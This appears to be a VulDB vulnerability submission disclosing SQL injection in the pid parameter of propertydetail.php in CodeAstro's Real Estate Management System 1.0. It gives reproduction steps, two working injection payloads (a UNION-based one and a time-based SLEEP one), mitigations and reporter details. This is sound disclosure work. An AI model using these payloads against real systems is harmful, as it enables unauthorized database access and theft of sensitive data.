| Title | codeastro web application 1.0 SQL Injection |
|---|
| Description | Introduction:
This document outlines the identification and details of a SQL Injection
vulnerability discovered in Real Estate Management System in PHP
Project Name: Real Estate Management System in PHP
Version: version 1.0
Vendor: codeastro.com
Project Link: [Real Estate Management System] (https://codeastro.com/real-estate-management-system-in-php-with-source-code/)
Vulnerability Details:
Vulnerability Type: SQL Injection
Impact: Attacker can inject malicious code
Affected Parameter: pid in http://localhost/RealEstate-PHP/propertydetail.php?pid=
Severity: High
Description:
The Real Estate Management System is susceptible to SQL injection through the pid parameter on the propertydetail.php page. An attacker could exploit this vulnerability to manipulate the database and compromise sensitive information.
Reproduction Steps:
Access the URL http://localhost/RealEstate-PHP/propertydetail.php?pid=
Use below mentioned payloads in pid
Payloads Used:
1.
%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71707a7671,0x79556b757a7058537a557562706745645a734470697458794c5771584e58444b72624d76526d5546,0x7171716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20-
2.
AND (SELECT 5827 FROM (SELECT(SLEEP(5)))UGKM) AND 'eopl'='eopl
Mitigation Steps:
• Input Validation: Implement strict input validation and use parameterized queries to prevent SQL injection.
• Update System: Keep the Real Estate Management System, PHP, and server components up-to-date with the latest security patches.
• Security Audits: Regularly audit system security and consider professional assessments to identify and fix vulnerabilities.
• Education: Train developers on secure coding practices, emphasizing input validation and secure database handling.
Reporter Information:
Name: Pranav P Ramesh
Contact Information: [email protected]
Role: Senior security engineer
Project Details:
Project Name: Real Estate Management System in PHP
Version: version 1.0
Vendor: codeastro.com
Project Link: [Real Estate Management System] (https://codeastro.com/real-estate-management-system-in-php-with-source-code/)
Source of Project: Real Estate Management System from
Discovery Date: 12-01-2024
Responsible Disclosure:
I commit to responsible disclosure and will not publicly disclose the vulnerability until it
has been addressed.
Preferred Communication Method: [email protected]
Timeline: The vulnerability was discovered on 12-01-2024
|
|---|
| Source | ⚠️ https://drive.google.com/drive/folders/1U2nirIi6OtuCi-vrD2-VHyJbsHK5yA7t?usp=sharing |
|---|
| User | Pranav P Ramesh (UID 61394) |
|---|
| Submission | 01/12/2024 19:12 (2 years ago) |
|---|
| Moderation | 01/14/2024 19:50 (2 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 250713 [CodeAstro Real Estate Management System up to 1.0 propertydetail.php pid sql injection] |
|---|
| Points | 20 |
|---|